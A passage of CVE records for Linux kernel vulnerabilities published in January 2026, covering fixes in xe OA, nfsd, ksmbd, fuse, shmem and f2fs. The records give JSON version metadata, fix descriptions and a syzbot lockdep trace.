"drivers/gpu/drm/xe/xe_oa.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.11"
},
{
"lessThan": "6.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:58.359Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c6d30b65b7a44dac52ad49513268adbf19eab4a2"
},
{
"url": "https://git.kernel.org/stable/c/7cdb9a9da935c687563cc682155461fef5f9b48d"
},
{
"url": "https://git.kernel.org/stable/c/dcb171931954c51a1a7250d558f02b8f36570783"
}
],
"title": "drm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71099",
"datePublished": "2026-01-13T15:34:58.359Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-13T15:34:58.359Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71090 (GCVE-0-2025-71090)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()
nfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites
fp->fi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if
the client already has a SHARE_ACCESS_READ open from a previous OPEN
operation, this action overwrites the existing pointer without
releasing its reference, orphaning the previous reference.
Additionally, the function originally stored the same nfsd_file
pointer in both fp->fi_fds[O_RDONLY] and fp->fi_rdeleg_file with
only a single reference. When put_deleg_file() runs, it clears
fi_rdeleg_file and calls nfs4_file_put_access() to release the file.
However, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when
the fi_access[O_RDONLY] counter drops to zero. If another READ open
exists on the file, the counter remains elevated and the nfsd_file
reference from the delegation is never released. This potentially
causes open conflicts on that file.
Then, on server shutdown, these leaks cause __nfsd_file_cache_purge()
to encounter files with an elevated reference count that cannot be
cleaned up, ultimately triggering a BUG() in kmem_cache_destroy()
because there are still nfsd_file objects allocated in that cache.
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfsd/nfs4state.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c07dc84ed67c5a182273171639bacbbb87c12175",
"status": "affected",
"version": "e7a8ebc305f26cab608e59a916a4ae89d6656c5f",
"versionType": "git"
},
{
"lessThan": "8072e34e1387d03102b788677d491e2bcceef6f5",
"status": "affected",
"version": "e7a8ebc305f26cab608e59a916a4ae89d6656c5f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfsd/nfs4state.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.17"
},
{
"lessThan": "6.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()\n\nnfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites\nfp-\u003efi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if\nthe client already has a SHARE_ACCESS_READ open from a previous OPEN\noperation, this action overwrites the existing pointer without\nreleasing its reference, orphaning the previous reference.\n\nAdditionally, the function originally stored the same nfsd_file\npointer in both fp-\u003efi_fds[O_RDONLY] and fp-\u003efi_rdeleg_file with\nonly a single reference. When put_deleg_file() runs, it clears\nfi_rdeleg_file and calls nfs4_file_put_access() to release the file.\n\nHowever, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when\nthe fi_access[O_RDONLY] counter drops to zero. If another READ open\nexists on the file, the counter remains elevated and the nfsd_file\nreference from the delegation is never released. This potentially\ncauses open conflicts on that file.\n\nThen, on server shutdown, these leaks cause __nfsd_file_cache_purge()\nto encounter files with an elevated reference count that cannot be\ncleaned up, ultimately triggering a BUG() in kmem_cache_destroy()\nbecause there are still nfsd_file objects allocated in that cache."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:51.777Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c07dc84ed67c5a182273171639bacbbb87c12175"
},
{
"url": "https://git.kernel.org/stable/c/8072e34e1387d03102b788677d491e2bcceef6f5"
}
],
"title": "nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71090",
"datePublished": "2026-01-13T15:34:51.777Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:51.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68806 (GCVE-0-2025-68806)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
Title
ksmbd: fix buffer validation by including null terminator size in EA length
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix buffer validation by including null terminator size in EA length
The smb2_set_ea function, which handles Extended Attributes (EA),
was performing buffer validation checks that incorrectly omitted the size
of the null terminating character (+1 byte) for EA Name.
This patch fixes the issue by explicitly adding '+ 1' to EaNameLength where
the null terminator is expected to be present in the buffer, ensuring
the validation accurately reflects the total required buffer size.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: d070c4dd2a5bed4e9832eec5b6c029c7d14892ea , < cae52c592a07e1d3fa3338a5f064a374a5f26750 (git) |
| | | Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < a28a375a5439eb474e9f284509a407efb479c925 (git) |
| | | Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < d26af6d14da43ab92d07bc60437c62901dc522e6 (git) |
| | | Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < 6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4 (git) |
| | | Affected: 0ba5439d9afa2722e7728df56f272c89987540a4 , < 95d7a890e4b03e198836d49d699408fd1867cb55 (git) |
| | | Affected: bb5bf157b5be1643cccc7cbbe57fcdef9ae52c2c (git) |
| | | Affected: 1a13ecb96230e8b7b91967e292836f7b01ec8111 (git) |
| | | Affected: 404e7c01e16288b5e0171d1d8fd3328e806d0794 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cae52c592a07e1d3fa3338a5f064a374a5f26750",
"status": "affected",
"version": "d070c4dd2a5bed4e9832eec5b6c029c7d14892ea",
"versionType": "git"
},
{
"lessThan": "a28a375a5439eb474e9f284509a407efb479c925",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "d26af6d14da43ab92d07bc60437c62901dc522e6",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"lessThan": "95d7a890e4b03e198836d49d699408fd1867cb55",
"status": "affected",
"version": "0ba5439d9afa2722e7728df56f272c89987540a4",
"versionType": "git"
},
{
"status": "affected",
"version": "bb5bf157b5be1643cccc7cbbe57fcdef9ae52c2c",
"versionType": "git"
},
{
"status": "affected",
"version": "1a13ecb96230e8b7b91967e292836f7b01ec8111",
"versionType": "git"
},
{
"status": "affected",
"version": "404e7c01e16288b5e0171d1d8fd3328e806d0794",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/smb2pdu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.52",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.131",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix buffer validation by including null terminator size in EA length\n\nThe smb2_set_ea function, which handles Extended Attributes (EA),\nwas performing buffer validation checks that incorrectly omitted the size\nof the null terminating character (+1 byte) for EA Name.\nThis patch fixes the issue by explicitly adding \u0027+ 1\u0027 to EaNameLength where\nthe null terminator is expected to be present in the buffer, ensuring\nthe validation accurately reflects the total required buffer size."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:38.039Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cae52c592a07e1d3fa3338a5f064a374a5f26750"
},
{
"url": "https://git.kernel.org/stable/c/a28a375a5439eb474e9f284509a407efb479c925"
},
{
"url": "https://git.kernel.org/stable/c/d26af6d14da43ab92d07bc60437c62901dc522e6"
},
{
"url": "https://git.kernel.org/stable/c/6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4"
},
{
"url": "https://git.kernel.org/stable/c/95d7a890e4b03e198836d49d699408fd1867cb55"
}
],
"title": "ksmbd: fix buffer validation by including null terminator size in EA length",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68806",
"datePublished": "2026-01-13T15:29:13.797Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-14T08:51:38.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68791 (GCVE-0-2025-68791)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
fuse: missing copy_finish in fuse-over-io-uring argument copies
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: missing copy_finish in fuse-over-io-uring argument copies
Fix a possible reference count leak of payload pages during
fuse argument copies.
[Joanne: simplified error cleanup]
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c",
"fs/fuse/dev_uring.c",
"fs/fuse/fuse_dev_i.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b79938863f436960eff209130f025c4bd3026bf8",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
},
{
"lessThan": "6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd",
"status": "affected",
"version": "c090c8abae4b6b77a1bee116aa6c385456ebef96",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/dev.c",
"fs/fuse/dev_uring.c",
"fs/fuse/fuse_dev_i.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.14"
},
{
"lessThan": "6.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: missing copy_finish in fuse-over-io-uring argument copies\n\nFix a possible reference count leak of payload pages during\nfuse argument copies.\n\n[Joanne: simplified error cleanup]"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:03.553Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b79938863f436960eff209130f025c4bd3026bf8"
},
{
"url": "https://git.kernel.org/stable/c/6e0d7f7f4a43ac8868e98c87ecf48805aa8c24dd"
}
],
"title": "fuse: missing copy_finish in fuse-over-io-uring argument copies",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68791",
"datePublished": "2026-01-13T15:29:03.553Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-13T15:29:03.553Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71072 (GCVE-0-2025-71072)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
Title
shmem: fix recovery on rename failures
Summary
In the Linux kernel, the following vulnerability has been resolved:
shmem: fix recovery on rename failures
maple_tree insertions can fail if we are seriously short on memory;
simple_offset_rename() does not recover well if it runs into that.
The same goes for simple_offset_rename_exchange().
Moreover, shmem_whiteout() expects that if it succeeds, the caller will
progress to d_move(), i.e. that shmem_rename2() won't fail past the
successful call of shmem_whiteout().
Not hard to fix, fortunately - mtree_store() can't fail if the index we
are trying to store into is already present in the tree as a singleton.
For simple_offset_rename_exchange() that's enough - we just need to be
careful about the order of operations.
For simple_offset_rename() solution is to preinsert the target into the
tree for new_dir; the rest can be done without any potentially failing
operations.
That preinsertion has to be done in shmem_rename2() rather than in
simple_offset_rename() itself - otherwise we'd need to deal with the
possibility of failure after successful shmem_whiteout().
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < 4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113 (git) |
| | | Affected: a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < 4642686699a46718d7f2fb5acd1e9d866a9d9cca (git) |
| | | Affected: a2e459555c5f9da3e619b7e47a63f98574dc75f1 , < e1b4c6a58304fd490124cc2b454d80edc786665c (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/libfs.c",
"include/linux/fs.h",
"mm/shmem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
},
{
"lessThan": "4642686699a46718d7f2fb5acd1e9d866a9d9cca",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
},
{
"lessThan": "e1b4c6a58304fd490124cc2b454d80edc786665c",
"status": "affected",
"version": "a2e459555c5f9da3e619b7e47a63f98574dc75f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/libfs.c",
"include/linux/fs.h",
"mm/shmem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nshmem: fix recovery on rename failures\n\nmaple_tree insertions can fail if we are seriously short on memory;\nsimple_offset_rename() does not recover well if it runs into that.\nThe same goes for simple_offset_rename_exchange().\n\nMoreover, shmem_whiteout() expects that if it succeeds, the caller will\nprogress to d_move(), i.e. that shmem_rename2() won\u0027t fail past the\nsuccessful call of shmem_whiteout().\n\nNot hard to fix, fortunately - mtree_store() can\u0027t fail if the index we\nare trying to store into is already present in the tree as a singleton.\n\nFor simple_offset_rename_exchange() that\u0027s enough - we just need to be\ncareful about the order of operations.\n\nFor simple_offset_rename() solution is to preinsert the target into the\ntree for new_dir; the rest can be done without any potentially failing\noperations.\n\nThat preinsertion has to be done in shmem_rename2() rather than in\nsimple_offset_rename() itself - otherwise we\u0027d need to deal with the\npossibility of failure after successful shmem_whiteout()."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:26.089Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113"
},
{
"url": "https://git.kernel.org/stable/c/4642686699a46718d7f2fb5acd1e9d866a9d9cca"
},
{
"url": "https://git.kernel.org/stable/c/e1b4c6a58304fd490124cc2b454d80edc786665c"
}
],
"title": "shmem: fix recovery on rename failures",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71072",
"datePublished": "2026-01-13T15:31:26.089Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:26.089Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71065 (GCVE-0-2025-71065)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-13 15:31
Title
f2fs: fix to avoid potential deadlock
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid potential deadlock
As Jiaming Zhang and syzbot reported, there is potential deadlock in
f2fs as below:
Chain exists of:
  &sbi->cp_rwsem --> fs_reclaim --> sb_internal#2
 Possible unsafe locking scenario:
       CPU0                    CPU1
       ----                    ----
  rlock(sb_internal#2);
                               lock(fs_reclaim);
                               lock(sb_internal#2);
  rlock(&sbi->cp_rwsem);
 *** DEADLOCK ***
3 locks held by kswapd0/73:
#0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: balance_pgdat mm/vmscan.c:7015 [inline]
#0: ffffffff8e247a40 (fs_reclaim){+.+.}-{0:0}, at: kswapd+0x951/0x2800 mm/vmscan.c:7389
#1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_trylock_shared fs/super.c:562 [inline]
#1: ffff8880118400e0 (&type->s_umount_key#50){.+.+}-{4:4}, at: super_cache_scan+0x91/0x4b0 fs/super.c:197
#2: ffff888011840610 (sb_internal#2){.+.+}-{0:0}, at: f2fs_evict_inode+0x8d9/0x1b60 fs/f2fs/inode.c:890
stack backtrace:
CPU: 0 UID: 0 PID: 73 Comm: kswapd0 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120
print_circular_bug+0x2ee/0x310 kernel/locking/lockdep.c:2043
check_noncircular+0x134/0x160 kernel/locking/lockdep.c:2175
check_prev_add kernel/locking/lockdep.c:3165 [inline]
check_prevs_add kernel/locking/lockdep.c:3284 [inline]
validate_chain+0xb9b/0x2140 kernel/locking/lockdep.c:3908
__lock_acquire+0xab9/0xd20 kernel/locking/lockdep.c:5237
lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868
down_read+0x46/0x2e0 kernel/locking/rwsem.c:1537
f2fs_down_read fs/f2fs/f2fs.h:2278 [inline]
f2fs_lock_op fs/f2fs/f2fs.h:2357 [inline]
f2fs_do_truncate_blocks+0x21c/0x10c0 fs/f2fs/file.c:791
f2fs_truncate_blocks+0x10a/0x300 fs/f2fs/file.c:867
f2fs_truncate+0x489/0x7c0 fs/f2fs/file.c:925
f2fs_evict_inode+0x9f2/0x1b60 fs/f2fs/inode.c:897
evict+0x504/0x9c0 fs/inode.c:810
f2fs_evict_inode+0x1dc/0x1b60 fs/f2fs/inode.c:853
evict+0x504/0x9c0 fs/inode.c:810
dispose_list fs/inode.c:852 [inline]
prune_icache_sb+0x21b/0x2c0 fs/inode.c:1000
super_cache_scan+0x39b/0x4b0 fs/super.c:224
do_shrink_slab+0x6ef/0x1110 mm/shrinker.c:437
shrink_slab_memcg mm/shrinker.c:550 [inline]
shrink_slab+0x7ef/0x10d0 mm/shrinker.c:628
shrink_one+0x28a/0x7c0 mm/vmscan.c:4955
shrink_many mm/vmscan.c:5016 [inline]
lru_gen_shrink_node mm/vmscan.c:5094 [inline]
shrink_node+0x315d/0x3780 mm/vmscan.c:6081
kswapd_shrink_node mm/vmscan.c:6941 [inline]
balance_pgdat mm/vmscan.c:7124 [inline]
kswapd+0x147c/0x2800 mm/vmscan.c:7389
kthread+0x70e/0x8a0 kernel/kthread.c:463
ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
</TASK>
The root cause is deadlock among four locks as below:
kswapd
- fs_reclaim --- Lock A
- shrink_one
- evict
- f2fs_evict_inode
- sb_start_intwrite --- Lock B
- iput
- evict
- f2fs_evict_inode
- sb_start_intwrite --- Lock B
- f2fs_truncate
- f2fs_truncate_blocks
- f2fs_do_truncate_blocks
- f2fs_lock_op --- Lock C
ioctl
- f2fs_ioc_commit_atomic_write
- f2fs_lock_op --- Lock C
- __f2fs_commit_atomic_write
- __replace_atomic_write_block
- f2fs_get_dnode_of_data
- __get_node_folio
- f2fs_check_nid_range
- f2fs_handle_error
- f2fs_record_errors
- f2fs_down_write --- Lock D
open
- do_open
- do_truncate
- security_inode_need_killpriv
- f2fs_getxattr
- lookup_all_xattrs
- f2fs_handle_error
- f2fs_record_errors
- f2fs_down_write --- Lock D
- f2fs_commit_super
- read_mapping_folio
- filemap_alloc_folio_noprof
- prepare_alloc_pages
- fs_reclaim_acquire --- Lock A
In order to a
---truncated---
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 8bd6dff8b801abaa362272894bda795bf0cf1307 (git) |
| | | Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 6c3bab5c6261aa22c561ef56b7365959a90e7d91 (git) |
| | | Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < 86a85a7b622e6e8dba69810257733ce5eab5ed55 (git) |
| | | Affected: 95fa90c9e5a7f14c2497d5b032544478c9377c3a , < ca8b201f28547e28343a6f00a6e91fa8c09572fe (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/compress.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
